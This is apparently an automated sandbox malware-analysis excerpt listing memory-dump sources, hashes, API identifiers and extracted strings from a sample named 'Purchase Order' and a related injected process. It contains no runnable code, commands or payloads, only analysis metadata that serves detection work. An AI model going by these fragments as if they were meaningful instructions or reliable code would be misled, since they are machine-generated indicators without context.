                                                            • Opcode ID: f893a658d6131684763dec48aa70d89f8d9d142371afe8b90f7dd8faaad3dd46
                                                            • Instruction ID: e23c7ea29546540d04fe1580bacf859cd375d3d34b81950020f66ed642e1ed04
                                                            • Opcode Fuzzy Hash: f893a658d6131684763dec48aa70d89f8d9d142371afe8b90f7dd8faaad3dd46
                                                            • Instruction Fuzzy Hash: F390022120544446D10075585848A46000997D1305F55E011A20695A5DC6358A59A632
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: da5fa15e2c8bea8f824633f376f63d82644de1a156642cf0257634839fff4dc8
                                                            • Instruction ID: 2e462dc878ecbd150c9096c09ed222934a2aa6781a720de8eeacbf97d7a1bc90
                                                            • Opcode Fuzzy Hash: da5fa15e2c8bea8f824633f376f63d82644de1a156642cf0257634839fff4dc8
                                                            • Instruction Fuzzy Hash: D190022921340006D1807158584864A000997D2302F95E415A101A568CC9158A6D5722
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9aea45ff08788c44c649b0c24e148f1e79f757833b578fa8206debe8a1b12b7c
                                                            • Instruction ID: a35df927c6f40fc26ab84bda67cb498e1826f8b4b938e3d2a6a6d6f99dd8667e
                                                            • Opcode Fuzzy Hash: 9aea45ff08788c44c649b0c24e148f1e79f757833b578fa8206debe8a1b12b7c
                                                            • Instruction Fuzzy Hash: 9C90022130140007D140715858586464009E7E2301F55E011E1419564CD9158A5E5723
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b99a61b2c009b7979d2a828191964db1ebb4de7e659ea0e44fbabec509815b5f
                                                            • Instruction ID: 40e786307af66b9a7da6780d74093491591a6eb8a03c32679ce4757a69b9ddc9
                                                            • Opcode Fuzzy Hash: b99a61b2c009b7979d2a828191964db1ebb4de7e659ea0e44fbabec509815b5f
                                                            • Instruction Fuzzy Hash: DB90023120140406D10075985848686000997E1301F55E011A6029565EC6658A996632
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bbd9c4a3f62d3df78fdebd87c6b93aa49512bdde0df3928f965ff159e1286a4
                                                            • Instruction ID: 104dfc23f476e55835fded525c2355680aa20b03b7be8113575346af5cd64e6f
                                                            • Opcode Fuzzy Hash: 9bbd9c4a3f62d3df78fdebd87c6b93aa49512bdde0df3928f965ff159e1286a4
                                                            • Instruction Fuzzy Hash: 5190022160540406D14071585858746001997D1301F55E011A1029564DC6598B5D6BA2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6edc828046d245c74260a2e894110b849d6722b5f9814f93803f5b7b5259e23
                                                            • Instruction ID: e08f8192d0cc025d4160cc1bb88e1ad293b0262042509f625c6a90ee9c93c015
                                                            • Opcode Fuzzy Hash: e6edc828046d245c74260a2e894110b849d6722b5f9814f93803f5b7b5259e23
                                                            • Instruction Fuzzy Hash: 7390023120140407D10071585948747000997D1301F55E411A1429568DD6568A596622
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1d3cb131ce94196ebdde521af7751f96e2cbdf146343e86c131ca9eab6f74ba9
                                                            • Instruction ID: ccb542d19543b9539815910c64c726e0c062bfa139b515ca94d0e3ad06261f95
                                                            • Opcode Fuzzy Hash: 1d3cb131ce94196ebdde521af7751f96e2cbdf146343e86c131ca9eab6f74ba9
                                                            • Instruction Fuzzy Hash: FB90023120140846D10071584844B86000997E1301F55D016A1129664DC615CA597A22
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4d1810f2fd4ee5aa21d982251bb00b8e7ba291af5217e39b83fa0c775b6fd74b
                                                            • Instruction ID: 6a0da59503dc9c6ac0f2ea1d8995925a6936f7f53f741efdf0a5f523952a87ff
                                                            • Opcode Fuzzy Hash: 4d1810f2fd4ee5aa21d982251bb00b8e7ba291af5217e39b83fa0c775b6fd74b
                                                            • Instruction Fuzzy Hash: 2790023120180406D10071584C5474B000997D1302F55D011A2169565DC6258A596A72
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ffa019f54ecbdedff10d10462c77645ac18c64aceda526f232be144720680f4
                                                            • Instruction ID: ec35fdfdf13059428983a89dccce95521baf327f256994fc6683dc8f3f6f1f53
                                                            • Opcode Fuzzy Hash: 5ffa019f54ecbdedff10d10462c77645ac18c64aceda526f232be144720680f4
                                                            • Instruction Fuzzy Hash: FD90023120180406D10071584C48787000997D1302F55D011A6169565EC665CA996A32
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: feee6b708ad6c82c67830ad67633f4d4ab563eb32e85d0bf2bb0efe057e7e3c1
                                                            • Instruction ID: 73817803902f14d5a9da092b51401f8c99fadb764405b8a99700725588f8e946
                                                            • Opcode Fuzzy Hash: feee6b708ad6c82c67830ad67633f4d4ab563eb32e85d0bf2bb0efe057e7e3c1
                                                            • Instruction Fuzzy Hash: AC90022160140046414071688C849464009BBE2311755D121A199D560DC5598A6D5B66
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b05251befa2f165bdc8518c16b354ff5b189139a84a8f3208ad2873f672f64ac
                                                            • Instruction ID: 08b6df357c573eeb9f4257ad32672b0af59d0b12c1bedfc3cf5d03db4fa175c5
                                                            • Opcode Fuzzy Hash: b05251befa2f165bdc8518c16b354ff5b189139a84a8f3208ad2873f672f64ac
                                                            • Instruction Fuzzy Hash: 33900221211C0046D20075684C54B47000997D1303F55D115A1159564CC9158A695A22
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 408c01b55724bfbe1ad41e6ae1cf02a77f0a07c6261db834ff038f27a568eb4c
                                                            • Instruction ID: dd38998439b02301ac736be90c0ff5df40d102d8584912a6ffe237dc2f08667a
                                                            • Opcode Fuzzy Hash: 408c01b55724bfbe1ad41e6ae1cf02a77f0a07c6261db834ff038f27a568eb4c
                                                            • Instruction Fuzzy Hash: C190026134140446D10071584854B460009D7E2301F55D015E2069564DC619CE5A6627
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8859ecd6c9073f731bc50e783a4da1f94c6c8f391b168ae20e4ba4c69c000c2e
                                                            • Instruction ID: dc24e854d8b23fb14759b99b0679a4e045222eca798760ee8ce835b66d7c05a0
                                                            • Opcode Fuzzy Hash: 8859ecd6c9073f731bc50e783a4da1f94c6c8f391b168ae20e4ba4c69c000c2e
                                                            • Instruction Fuzzy Hash: 0790026121140046D10471584844746004997E2301F55D012A3159564CC5298E695626
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 59dae94a2d46c2972b4d7f9f216c15f29656ae6e6fccffac3d8e7cef746139e3
                                                            • Instruction ID: b280621807846a3e18efc8b2b5cc9459a92b91932851ca6c277b44a7ac7113a5
                                                            • Opcode Fuzzy Hash: 59dae94a2d46c2972b4d7f9f216c15f29656ae6e6fccffac3d8e7cef746139e3
                                                            • Instruction Fuzzy Hash: EA90022160140506D10171584844656000E97D1341F95D022A2029565ECA258B9AA632
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                                            • Instruction ID: 405ee2b63be1e87b99eaef81be36d9ad88f1dac0735e08896355a61e03d99192
                                                            • Opcode Fuzzy Hash: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                                            • Instruction Fuzzy Hash: E851F9B2A0021ABFDB25DB9C89D097EFBB9BB48740B948229F495D7641D334DF0087E0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                                            • Instruction ID: 85f3fb51820a1b5a50e0cc5f3b2a7220a4ebc6063d379fe2a95485a3a8fa7039
                                                            • Opcode Fuzzy Hash: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                                            • Instruction Fuzzy Hash: 97512A71A006496ECB30EF5CC9D087FB7FCEB44301B648869F59AD7685E674DA808760
                                                            Strings
                                                            • Execute=1, xrefs: 018D4713
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 018D4787
                                                            • ExecuteOptions, xrefs: 018D46A0
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018D46FC
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018D4655
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018D4725
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018D4742
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                                            • Instruction ID: 672e325399dc7e4e60828f12a082a32e844e3b8c2cf5da90e6cdca7e4f7c3457
                                                            • Opcode Fuzzy Hash: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                                            • Instruction Fuzzy Hash: 3251093165021D7BEF21AFA8DC89FAD77A8AF55304F0800A9D605EB181EB70AB45CF95
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 3b5e5b8a5e5c4832d1f5056523aa9ef1fc3ed7699cd2bc86bae7de93d48bcdca
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: CD81AF70E052499FFF298E6CC8917FEBFB1AF45360F984219D861E7291C7749A40CB51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                                            • Instruction ID: ad5e58f75c554b30c5e7a9618ea15bd7f6ff8762533bc1d7881886703d0900a9
                                                            • Opcode Fuzzy Hash: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                                            • Instruction Fuzzy Hash: 3F214F7AA0011DABDB11EF69C840AEEBBFDEF54754F580126E909E3204E730DA418BA1
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018D02BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018D02E7
                                                            • RTL: Re-Waiting, xrefs: 018D031E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                                            • Instruction ID: 3b45dea7df11fddf30f3819c062f054df513c34675e45dda47f8d9c59d0cc6e6
                                                            • Opcode Fuzzy Hash: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                                            • Instruction Fuzzy Hash: E5E18C306087429FE725EF2CC884B2ABBE0BB85318F140A5DF6A5CB2D1D774DA45CB52
                                                            Strings
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018D7B7F
                                                            • RTL: Resource at %p, xrefs: 018D7B8E
                                                            • RTL: Re-Waiting, xrefs: 018D7BAC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                                            • Instruction ID: 414991d08dccdf6cbbcd1bdd8a0a42e348d372938281198ce2f5ddb56376c209
                                                            • Opcode Fuzzy Hash: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                                            • Instruction Fuzzy Hash: 924104313007069FDB20DE29D840F6AB7E5EF89714F140A1DFA5ADB780DB71EA058B91
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018D728C
                                                            Strings
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018D7294
                                                            • RTL: Resource at %p, xrefs: 018D72A3
                                                            • RTL: Re-Waiting, xrefs: 018D72C1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                                            • Instruction ID: 57be1ebb26e989b460472533eee0e708e4eb18a5e7b9830f888afb4b745bf629
                                                            • Opcode Fuzzy Hash: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                                            • Instruction Fuzzy Hash: B5411131700346ABDB21DE29CC81F6AB7A5FF95718F140619FA56EB240DB31FA428BD1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                                            • Instruction ID: 57d9816d619ef909ceb83edff5f3d2c2647594135042fae8198bdd361d9d11c3
                                                            • Opcode Fuzzy Hash: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                                            • Instruction Fuzzy Hash: 44317372A002199FDB20DF2DCC40BEEB7B8EB54751F940555E949E3244EB30AA458BA1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: d3f2071d455bc2b0fa9422c931d90c9982220fcece1d1d376b2a8de536508cbb
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 5391C571E0020A9BFF24DF6DC8806BEBBB5AF44720F94451AEA55E72C4E7728B409761
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                                            • Instruction ID: 52043a69ad0d5edee13e60bd6cc29fda7bf025da813aa1335014c7a95a6ec065
                                                            • Opcode Fuzzy Hash: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                                            • Instruction Fuzzy Hash: 67810B71D00269DBDB25DB58CC44BEAB7B8AB48714F0041DAEA19F7280D7309F85CF61
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 018ECFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4Qw@4Qw
                                                            • API String ID: 4062629308-2383119779
                                                            • Opcode ID: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                                            • Instruction ID: 2507c04d562dcbdda05d1fb84761473ab54084bd2f2e30c60206b8345d6c1035
                                                            • Opcode Fuzzy Hash: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                                            • Instruction Fuzzy Hash: DD41AE71900219DFDB21DFA9C844AAEBBF8FF95B40F04412AE905EB254E770DA05CB62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: j$$=$($8^$=$L7$O5$Z$[$[$[5$]$d&$fX$k^$q$sw$y$}$4
                                                            • API String ID: 0-2360868250
                                                            • Opcode ID: 85edb4427501362f91567d6807435bff14aaa73594397eb8973f0ba859faa158
                                                            • Instruction ID: b2c1f0ab0af377446ab5767e29aa0833986f0613c61edf7a6f1137939c3eb74c
                                                            • Opcode Fuzzy Hash: 85edb4427501362f91567d6807435bff14aaa73594397eb8973f0ba859faa158
                                                            • Instruction Fuzzy Hash: 0E02F3B0E05228CFEB28CF49C954BDDBBB2BF45308F1481DAD54AAB285C7B51A85CF51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$O$S$\$s
                                                            • API String ID: 0-3854637164
                                                            • Opcode ID: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                            • Instruction ID: 11a988f262931a35da26609255f7618cc03ad99f407a6fee877792c0378b7ffa
                                                            • Opcode Fuzzy Hash: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                            • Instruction Fuzzy Hash: E251CAB6D01318AFDB10EF94DD89EEEB378EF44311F14819AED085B201F7749A088BA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "1$~!
                                                            • API String ID: 0-4146445991
                                                            • Opcode ID: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                            • Instruction ID: 220f95279b46d4456f0e79389036b57063c59ac590c2c1ea5cf4537a2b57c62c
                                                            • Opcode Fuzzy Hash: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                            • Instruction Fuzzy Hash: 0301D7B6D0121CAE9B50DFE8D9419EEBBF8AB18200F14856AE905F7240F7749A048BA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "
                                                            • API String ID: 0-1165748306
                                                            • Opcode ID: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                            • Instruction ID: 86a2c14f9ded7c471030dbb0721cd23d3b6054fa0343303c5562f40b02a3d3a1
                                                            • Opcode Fuzzy Hash: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                            • Instruction Fuzzy Hash: AE21F1B6D0121DAF8B00DFE9D9419EFB7F9EF48210F14415AE915E7200E7719A148BA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H
                                                            • API String ID: 0-198657301
                                                            • Opcode ID: 8a3b2ebfe9411b7b50762135d2d539b95a6b20192640d762479a6f27ef957061
                                                            • Instruction ID: 67a93503cc815921a68ef3260db9426f7960b35e504533f570798197f5c71b11
                                                            • Opcode Fuzzy Hash: 8a3b2ebfe9411b7b50762135d2d539b95a6b20192640d762479a6f27ef957061
                                                            • Instruction Fuzzy Hash: 022100B6D0121CAF9B04DFA9D9419EFB7F9EF48210F14856EE919E7200E7759A048BA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6r
                                                            • API String ID: 0-1993249690
                                                            • Opcode ID: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                            • Instruction ID: e510a75c9f86863045aa53a1bbb8e80eb3448d3277ea93277c721f06b3f1c5fd
                                                            • Opcode Fuzzy Hash: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
